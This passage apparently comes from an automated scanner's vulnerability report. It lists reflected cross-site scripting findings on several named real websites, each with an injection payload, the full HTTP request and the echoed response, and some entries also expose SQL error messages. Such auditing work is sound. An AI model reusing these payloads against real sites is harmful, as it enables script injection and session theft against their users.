User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:27:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=d5718db51144d4b9ce1923afced22613; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 11599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<LINK REL="SHORTCUT ICON" H
...[SNIP]...
if (!areYouReallySure && !internalLink && !properClickThrough) {
window.onbeforeunload = null;
//alert('Wait!');
window.location = 'search_results.php?f=rg85c5a</script><script>alert(1)</script>6077bb4736d&q=Adecco jobs&l=Houston, TX';
return "**********************************\n\nWait Before you go...\n\nClick *CANCEL* to see your job search results right away!\n\n************************
...[SNIP]...

2.211. http://www.findmylocaljob.net/profile.php [f parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.findmylocaljob.net
Path:   /profile.php

Issue detail

The value of the f request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28431"><script>alert(1)</script>e91b65c3cd6 was submitted in the f parameter. This input was echoed as 28431\"><script>alert(1)</script>e91b65c3cd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /profile.php?f=g28431"><script>alert(1)</script>e91b65c3cd6&kw=Adecco%20jobs HTTP/1.1
Host: www.findmylocaljob.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:27:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=5172297eb526202497645cd2197b9585; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 11581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<LINK REL="SHORTCUT ICON" H
...[SNIP]...
<input type=hidden name=f id=f value="g28431\"><script>alert(1)</script>e91b65c3cd6">
...[SNIP]...

2.212. http://www.findmylocaljob.net/profile.php [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.findmylocaljob.net
Path:   /profile.php

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f63fd</script><script>alert(1)</script>2190c6a7f52 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.php?f=g&kw=Adecco%20jobsf63fd</script><script>alert(1)</script>2190c6a7f52 HTTP/1.1
Host: www.findmylocaljob.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:27:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3e18519664870972ab953f4a542ed033; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 11599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<LINK REL="SHORTCUT ICON" H
...[SNIP]...
uReallySure && !internalLink && !properClickThrough) {
window.onbeforeunload = null;
//alert('Wait!');
window.location = 'search_results.php?f=rg&q=Adecco jobsf63fd</script><script>alert(1)</script>2190c6a7f52&l=Houston, TX';
return "**********************************\n\nWait Before you go...\n\nClick *CANCEL* to see your job search results right away!\n\n**********************************";

...[SNIP]...

2.213. http://www.findmylocaljob.net/profile.php [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.findmylocaljob.net
Path:   /profile.php

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26c1"><script>alert(1)</script>9a6b24d105 was submitted in the kw parameter. This input was echoed as c26c1\"><script>alert(1)</script>9a6b24d105 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /profile.php?f=g&kw=Adecco%20jobsc26c1"><script>alert(1)</script>9a6b24d105 HTTP/1.1
Host: www.findmylocaljob.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:27:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=b5082b71fbb10c17ecc6f823e34ed5d5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 11578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<LINK REL="SHORTCUT ICON" H
...[SNIP]...
<INPUT maxLength="512" value="Adecco jobsc26c1\"><script>alert(1)</script>9a6b24d105" id="what" name="q">
...[SNIP]...

2.214. http://www.findmylocaljob.net/profile.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.findmylocaljob.net
Path:   /profile.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73ba4"><script>alert(1)</script>3dc155e170b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73ba4\"><script>alert(1)</script>3dc155e170b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /profile.php?f=g&kw=Adecco%20/73ba4"><script>alert(1)</script>3dc155e170bjobs HTTP/1.1
Host: www.findmylocaljob.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:27:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=d5b6307d19dd1d9cc4602e548794e09c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 11584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<LINK REL="SHORTCUT ICON" H
...[SNIP]...
<INPUT maxLength="512" value="Adecco /73ba4\"><script>alert(1)</script>3dc155e170bjobs" id="what" name="q">
...[SNIP]...

2.215. http://www.findmylocaljob.net/profile.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.findmylocaljob.net
Path:   /profile.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0574</script><script>alert(1)</script>f521c798b0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.php?f=g&kw=Adecco%20/c0574</script><script>alert(1)</script>f521c798b0fjobs HTTP/1.1
Host: www.findmylocaljob.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:27:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=858b1817a7cfbedfc8bd5790014aac44; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 11602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<LINK REL="SHORTCUT ICON" H
...[SNIP]...
eYouReallySure && !internalLink && !properClickThrough) {
window.onbeforeunload = null;
//alert('Wait!');
window.location = 'search_results.php?f=rg&q=Adecco /c0574</script><script>alert(1)</script>f521c798b0fjobs&l=Houston, TX';
return "**********************************\n\nWait Before you go...\n\nClick *CANCEL* to see your job search results right away!\n\n**********************************
...[SNIP]...

2.216. http://www.ford.ca/app/fo/en/parts_and_services/offers/works.do [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ford.ca
Path:   /app/fo/en/parts_and_services/offers/works.do

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 534eb--><img%20src%3da%20onerror%3dalert(1)>764845d81ca was submitted in the REST URL parameter 5. This input was echoed as 534eb--><img src=a onerror=alert(1)>764845d81ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /app/fo/en/parts_and_services/offers534eb--><img%20src%3da%20onerror%3dalert(1)>764845d81ca/works.do HTTP/1.1
Host: www.ford.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Thu, 25 Nov 2010 05:27:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00008UIJUTroUL17HJdx_ZSOBqh:136vm3ur9; Path=/
Set-Cookie: language=en_CA; Expires=Fri, 25 Nov 2011 05:27:00 GMT; Path=/
Set-Cookie: viewedVehicles=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: customer=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: driver=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Content-Length: 87463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="ht
...[SNIP]...
<!--Raw Page key = parts.offers534eb--><img src=a onerror=alert(1)>764845d81ca.works-->
...[SNIP]...

2.217. http://www.fullsail.edu/index.cfm [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fullsail.edu
Path:   /index.cfm

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceeb5"><script>alert(1)</script>331ebf2fbf0 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fa=landing.CAO_1a&mnc=1293&kw=Harlequin%20NFH%20Onlineceeb5"><script>alert(1)</script>331ebf2fbf0&utm_source=GDC&utm_medium=banner&utm_term=Harlequin%20NFH%20Online&utm_content=CAO_1a&utm_campaign=CAO/ HTTP/1.1
Host: www.fullsail.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:27:52 GMT
Server: Apache/2.2.14 (Win32) JRun/4.0
Set-Cookie: MNC=1293;domain=.fullsail.edu;expires=Thu, 09-Dec-2010 05:27:52 GMT;path=/
Set-Cookie: MNCKEYWORD=Harlequin%20NFH%20Onlineceeb5%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E331ebf2fbf0;domain=.fullsail.edu;expires=Thu, 09-Dec-2010 05:27:52 GMT;path=/
Cache-Control: max-age=259200
Expires: Sun, 28 Nov 2010 05:27:52 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

   
   <title>Full Sail University</title>
   <base href="www.f
...[SNIP]...
<input type="hidden" name="MncKeyword" value="Harlequin NFH Onlineceeb5"><script>alert(1)</script>331ebf2fbf0">
...[SNIP]...

2.218. http://www.gahtan.com/cgi/cdnlaw/jump.cgi [ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gahtan.com
Path:   /cgi/cdnlaw/jump.cgi

Issue detail

The value of the ID request parameter is copied into the HTML document as plain text between tags. The payload 63ecc<script>alert(1)</script>57716fed1d8 was submitted in the ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi/cdnlaw/jump.cgi?ID=16863ecc<script>alert(1)</script>57716fed1d8 HTTP/1.1
Host: www.gahtan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:27:31 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 64
Connection: close
Content-Type: text/plain

Error: Invalid id: 16863ecc<script>alert(1)</script>57716fed1d8

2.219. http://www.getdecorating.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.getdecorating.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96969"><a>47758afb9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?96969"><a>47758afb9f=1 HTTP/1.1
Host: www.getdecorating.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Nov 2010 05:30:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=1676292;expires=Sat, 17-Nov-2040 05:30:13 GMT;path=/
Set-Cookie: CFTOKEN=28129679;expires=Sat, 17-Nov-2040 05:30:13 GMT;path=/
Set-Cookie: CFID=1676292;path=/
Set-Cookie: CFTOKEN=28129679;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml
...[SNIP]...
<a href="/default.cfm?96969"><a>47758afb9f=1&lang=es">
...[SNIP]...

2.220. http://www.halifaxkiosk.com/directory.php [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.halifaxkiosk.com
Path:   /directory.php

Issue detail

The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 484e0<a>17bffb3590c was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /directory.php?name=Consulting&categoryId=228484e0<a>17bffb3590c HTTP/1.1
Host: www.halifaxkiosk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:27:55 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html
Content-Length: 1335

mysql error: [1054: Unknown column 'a' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 228484e0<a>17bffb3590c ORDER BY name ASC")
<pre align=left> &nbsp; &n
...[SNIP]...

2.221. http://www.hamiltonkiosk.ca/directory.php [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hamiltonkiosk.ca
Path:   /directory.php

Issue detail

The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload 5a7ce<a>14a91f0024d was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /directory.php?name=Consulting&categoryId=2285a7ce<a>14a91f0024d HTTP/1.1
Host: www.hamiltonkiosk.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 05:28:01 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.0
Connection: close
Content-Type: text/html
Content-Length: 1342

mysql error: [1054: Unknown column '2285a7ce' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 2285a7ce<a>14a91f0024d ORDER BY name ASC")
<pre align=left> &nb
...[SNIP]...

2.222. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelsoup.com
Path:   /hotel.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6baa7"><script>alert(1)</script>7dd6a604caf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel.php?6baa7"><script>alert(1)</script>7dd6a604caf=1 HTTP/1.1
Host: www.hotelsoup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 25 Nov 2010 05:28:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 25 Nov 2010 05:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SVRID=1320; path=/
Set-Cookie: PHPSESSID=972v7aum1fe3gonqfng2ufqvi0; path=/
Set-Cookie: acache=6141cabdb1c7b59a69363f3f4f08abb28156ca66-66dc60f6b7baa4dbce9d3b325cad734af019b3c0
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ehzJQ7A6deBKTSEKj3WcyDUg-G_85UPKaX9pecHYYJIPPm1a3rEbHh5W2GaysNxwMkYhxlQO-o-kf_in1Ri2_CHOcsANvX5k84njdEPVpVju9MpIDe8_jkEwdMj7d25lutKSMBYXqgLeYEENLOWsxn5Eble1QxvJLD1qNF5oCryaByFvb6oOhsQ-IJrLKbNj4b4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Tue, 24-Nov-2020 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ehzJQ7A6deBKTSEKj3WcyDUg-G_85UPKaX9pecHYYJIPPm1a3rEbHh5W2GaysNxwMkYhxlQO-o-kf_in1Ri2_CHOcsANvX5k84njdEPVpVju9MpIDe8_jkEwdMj7d25lutKSMBYXqgLeYEENLOWsxn5Eble1QxvJLD1qNF5oCryaByFvb6oOhsQ-IJrLKbNj4b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Tue, 24-Nov-2020 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ehzJQ7A6deBKTSEKj3WcyDUg-G_85UPKaX9pecHYYJIPPm1a3rEbHh5W2GaysNxwMkYhxlQO-o-kf_in1Ri2_CHOcsANvX5k84njdEPVpVju9MpIDe8_jkEwdMj7d25lutKSMBYXqgLeYEENLOWsxn5Eble1QxvJLD1qNF5oCryaByFvb6oOhsQ-IJrLKbNj4b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Tue, 24-Nov-2020 06:00:00 GMT; path=/
Set-Cookie: adc=CTX; path=/;
Content-Length: 48766

   <!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="5a4f1ee1ca979bc652b
...[SNIP]...
<input type="hidden" name="back" value="/hotel.php?6baa7"><script>alert(1)</script>7dd6a604caf=1" />
...[SNIP]...

2.223. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelsoup.com
Path:   /hotel.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a0df'><script>alert(1)</script>9c29eafabc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel.php?4a0df'><script>alert(1)</script>9c29eafabc6=1 HTTP/1.1
Host: www.hotelsoup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 25 Nov 2010 05:28:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 25 Nov 2010 05:28:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SVRID=1320; path=/
Set-Cookie: PHPSESSID=gnjn90lq716qf12pt4thi78ps7; path=/
Set-Cookie: acache=6141cabdb1c7b59a69363f3f4f08abb28156ca66-66dc60f6b7baa4dbce9d3b325cad734af019b3c0
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-esDgOiG1zPRoVkq_N88tGyuPD-EBBM7OeJ87LzzROWGFDcSutn67XORLUd9LjRP_YkYhxlQO-o-kf_in1Ri2_CHOcsANvX5k84njdEPVpVju9MpIDe8_jkGlaRx6RGBsK9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLD1qNF5oCryaByFvb6oOhsT-jg8G3yZsGL4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Tue, 24-Nov-2020 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-esDgOiG1zPRoVkq_N88tGyuPD-EBBM7OeJ87LzzROWGFDcSutn67XORLUd9LjRP_YkYhxlQO-o-kf_in1Ri2_CHOcsANvX5k84njdEPVpVju9MpIDe8_jkGlaRx6RGBsK9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLD1qNF5oCryaByFvb6oOhsT-jg8G3yZsGL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Tue, 24-Nov-2020 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-esDgOiG1zPRoVkq_N88tGyuPD-EBBM7OeJ87LzzROWGFDcSutn67XORLUd9LjRP_YkYhxlQO-o-kf_in1Ri2_CHOcsANvX5k84njdEPVpVju9MpIDe8_jkGlaRx6RGBsK9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLD1qNF5oCryaByFvb6oOhsT-jg8G3yZsGL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Tue, 24-Nov-2020 06:00:00 GMT; path=/
Set-Cookie: adc=CTX; path=/;
Content-Length: 48833

   <!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="5a4f1ee1ca979bc652b
...[SNIP]...
<a href='/hotel.php?4a0df'><script>alert(1)</script>9c29eafabc6=1&page=1'>
...[SNIP]...

2.224. http://www.ihirequalitycontrol.com/t-QC-jobs-listed.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ihirequalitycontrol.com
Path:   /t-QC-jobs-listed.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb928'%3b029bccb30a5 was submitted in the REST URL parameter 1. This input was echoed as cb928';029bccb30a5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cb928'%3b029bccb30a5 HTTP/1.1
Host: www.ihirequalitycontrol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19147
Content-Type: text/html
Expires: Thu, 25 Nov 2010 05:25:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: wtPage=SiteMap%5FRedirector%2Easp; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
Set-Cookie: referrerdata=NoVariable; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
Set-Cookie: AdGroup=NoVARIABLE; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
Set-Cookie: searchengine=NoVARIABLE; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
Set-Cookie: ihirematch=NoVARIABLE; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
Set-Cookie: origSite=NoVARIABLE; expires=Sun, 21-Dec-2036 05:00:00 GMT; path=/
